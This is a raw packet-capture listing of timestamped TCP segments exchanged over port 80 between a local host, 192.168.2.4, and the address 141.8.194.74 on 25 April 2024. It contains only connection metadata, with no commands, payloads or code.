                                                Apr 25, 2024 10:18:52.395132065 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395149946 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395169020 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395179987 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395186901 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395205975 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395224094 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395246983 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395263910 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395282984 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395302057 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395330906 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.401954889 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.464848042 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.705156088 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.705287933 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.705931902 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946023941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946502924 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946567059 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946607113 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946629047 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946685076 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946722984 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946758986 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946760893 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946799994 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946846008 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.946901083 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946943045 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946980000 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:29.946990013 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:29.947032928 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.186929941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.186975002 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187035084 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187072992 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187088013 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187112093 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187139988 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187153101 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187190056 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187203884 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187247038 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187284946 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187294960 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187323093 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187381029 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187429905 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187433958 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187474012 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187490940 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187513113 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187551975 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187578917 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187589884 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187630892 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187664032 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187665939 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187722921 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187733889 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.187761068 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.187879086 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.427927017 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428004980 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428047895 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428086042 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428138018 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428167105 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428180933 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428236008 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428272963 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428307056 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428309917 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428350925 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428368092 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428391933 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428430080 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428443909 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428467989 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428504944 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428543091 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428546906 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.428581953 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.428596020 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.430819988 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671466112 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671557903 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671597004 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671633005 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671657085 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671713114 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671717882 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671751976 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671788931 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671839952 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671875000 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671911955 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671932936 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.671948910 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.671987057 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672039986 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672060013 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672135115 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672158003 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672173977 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672213078 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672251940 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672286987 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672287941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672310114 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672374964 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672411919 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672432899 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672483921 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672525883 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672561884 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672569036 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672605038 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672642946 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672672033 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672683001 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672693968 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672755957 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672794104 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672811031 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.672899008 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672940016 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672977924 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.672996998 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673036098 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673051119 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673089981 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673125982 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673166037 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673198938 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673270941 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673270941 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673341990 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673378944 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673434019 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673451900 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673491001 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673505068 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673530102 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673567057 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673580885 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673604012 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673641920 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673681974 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.673681974 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.673743010 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:30.911957979 CEST8049744141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:30.914110899 CEST4974480192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.134438992 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.391176939 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.391263008 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.394668102 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651034117 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651479006 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651523113 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651561975 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651588917 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651599884 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651638985 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651657104 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651698112 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651735067 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651742935 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651772976 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651810884 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651810884 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.651849031 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:19:52.651892900 CEST4974580192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:19:52.908201933 CEST8049745141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085443974 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085457087 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085483074 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085520029 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085556984 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085594893 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085630894 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085635900 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085635900 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085649967 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085669041 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085705042 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085715055 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085741997 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085778952 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.085794926 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.085830927 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.087306976 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.328764915 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328809977 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328849077 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328886032 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328891039 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.328922033 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328959942 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.328970909 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.328995943 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329010010 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329035044 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329071045 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329088926 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329108000 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329144955 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329164028 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329181910 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329217911 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329257011 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329258919 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329293966 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329310894 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329349041 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329386950 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329406023 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329425097 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329463959 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329483032 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329518080 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329554081 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329575062 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329590082 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329627991 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329653978 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329665899 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329704046 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329720974 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329741955 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329777002 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329798937 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329812050 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329849005 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329869032 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329886913 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329922915 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329942942 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.329960108 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.329998016 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330015898 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330035925 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330071926 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330105066 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330110073 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330147028 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330164909 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330183983 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330220938 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330240965 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330259085 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330293894 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330312014 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330331087 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330368042 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330387115 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.330405951 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.330465078 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:20:47.570564032 CEST8049747141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:20:47.573030949 CEST4974780192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:01.948868036 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.191613913 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.191829920 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.191961050 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.434397936 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434752941 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434835911 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434859991 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434899092 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.434937000 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435004950 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435060978 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435105085 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435142040 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435146093 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.435146093 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.435178041 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.435184002 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.435230017 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.677723885 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677792072 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677831888 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677865028 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.677871943 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677911043 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677947044 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.677953005 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.677994013 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678020000 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678034067 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678072929 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678090096 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678109884 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678147078 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678172112 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678185940 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678251028 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678261042 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678289890 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678327084 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678344965 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678366899 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678405046 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678443909 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678459883 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678483963 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678524017 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.678540945 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.678572893 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.920994997 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921078920 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921128988 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921170950 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921210051 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921240091 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921247959 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921264887 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921288967 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921327114 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921340942 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921365976 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921403885 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921423912 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921447039 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921461105 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921488047 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921525955 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921561956 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921582937 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.921675920 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:02.921750069 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:02.922815084 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.166531086 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166594028 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166632891 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166690111 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.166691065 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166729927 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.166754007 CEST4974880192.168.2.4141.8.194.74
